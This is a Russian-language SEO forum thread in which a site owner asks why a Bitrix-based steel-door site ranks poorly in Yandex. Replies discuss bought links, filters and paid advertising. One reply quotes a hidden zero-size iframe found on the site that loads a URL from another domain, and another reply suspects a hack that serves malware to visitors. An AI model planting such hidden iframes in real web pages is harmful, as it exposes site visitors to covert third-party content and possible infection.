что это за санкция???

12 3
A
На сайте с 21.11.2007
Offline
2
2933

раскручивал сайт eurokey.ru месяца 3 но выше 69 места по металлическим дверям не поднялся, ссылок куплено на 600$ где-то + на ксапе 4000 ссылок по НЧ. В Гугле по металлическим дверям на второй странице. У сайта на главной был не уникальный контент поменял где то 1.5 месяца назад. Но позиции только в -. Еще у сайта 2 раза слетала база (сайт на Битрикс). Возможно ли наложение санкций из за слетевшей базы. Или может проблема ещё в чем то? :confused:

OPTIMER
На сайте с 05.01.2006
Offline
486
#1

Animator, да Вы хоть на тысячи долларов купите ссылок, хоть тысячи их штук по количеству - толку может не быть или быть очень мало.

Контент меняли, но Вы говорите, что прошло уже 1.5 мес, а это нормальный срок. :)

По поводу слетевшей базы - как долго сайт был недоступен?

+ возможно, роботы не попали на момент слета...

Работайте, продолжайте. Учитывайте качество ссылок на сайт. Ну и над самим сайтом работайте.

оО Раскрутка сайтов без абон. платы, единоразово от 100.000 руб.
A
На сайте с 21.11.2007
Offline
2
#2

базы как на зло слетали во время апов. :(...Но как объяснить то что в гугле сайт чувствует себя относительно нормально. А в яндексе на данный момент на 89 месте это фильтр "ты последний" или что? Мне нужно срочно узнать, что это за санкция, что говорить заказчику????????? 😕

[Удален]
#3

Animator, ну вот за это можно и в бан уйти

</html>

<iframe style="width:0px; height:0px; border:0px;" src="http://klinshop.ru/bitrix/spread.php?s=QklUUklYX1NNX0dVRVNUX0lEATgxMDkxATEyMjkzNTg2MzYBLwEBAkJJVFJJWF9TTV9MQVNUX1ZJU0lUATIxLjEyLjIwMDcgMTk6MzA6MzYBMTIyOTM1ODYzNgEvAQEC&amp;k=a8f5c265e307f95b218517dd17c3840d"></iframe>
<script type="text/javascript">loaded=true;</script>
A
На сайте с 21.11.2007
Offline
2
#4

а что это? сайт верстал не я и в битриксе не секу

[Удален]
#5

например это кусок кода способен загрузить вирус на сайт посетителя,

скорей всего Ваш сайт взломали меняйте пароли доступа и вычищаете сайт

да и вообще для начала не мешало бы привести сам сайт в порядок

OPTIMER
На сайте с 05.01.2006
Offline
486
#6

Animator, нет, фильтр "ты последний" тут не при чем.

То, что в гугле сайт чувствует себя нормально, это не значит, что в следующий ап Вы будете также на 2ой странице или выше :). Это так, к слову).

Андрей Бондаренко
На сайте с 02.11.2005
Offline
184
#7

На форуме недавно обсуждалась похожая тема. По некоторым конкурентным темам стоят какие то фильтры, за короткий срок вывести очень сложно. У самого сайт по "ремонту квартир" тусуется на протяжении 3-х месяцев на 70 месте, хотя работ было проведено много. При аналогичных методах в других тематиках сайты выводятся на ура(((

A
На сайте с 21.11.2007
Offline
2
#8

Ребята посоветуйте что-нибудь, что сделать с сайтом, возможно ли вывести его в топ по этому домену или нужно регить новый, какие методы использовать при продвижение??? (нужен ЦЕЛЕВОЙ траф...заказы)...заказчик получается выкинул на ветер 200 000р. все мои проекты а их 8 и все по дверям...чуствуют себя нормально, а этот единственный сайт который делал не я и только с ним у меня такая проблема, что говорить заказчику????????? Помогите в долгу не останусь.

A
На сайте с 21.11.2007
Offline
2
#9

Может попробовать альтернативу покупки ссылок...вирусный маркетинг в блогах, реклама на московских форумах, статьи, с рейтингов траф взять, рамблер, yandex каталог, рассылки по мылам в Москве, вобщем мне нужны советы...вопрос жизни или смерти завтра идти к заказчику :(

Подскажите минимальный срок приобретения целевого трафика (хотя бы 100-200 чел/в день) по запросам:

стальные двери

металлические двери

входные двери

железные двери

установка дверей

производство дверей

изготовление дверей

и Н.Ч.

Если кто реально может помочь могу отдать сайт...бюджет огромный!!!

S5
На сайте с 02.10.2006
Offline
83
#10

если бюджет огромный и срочно надо целевой трафик юзайте директ.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий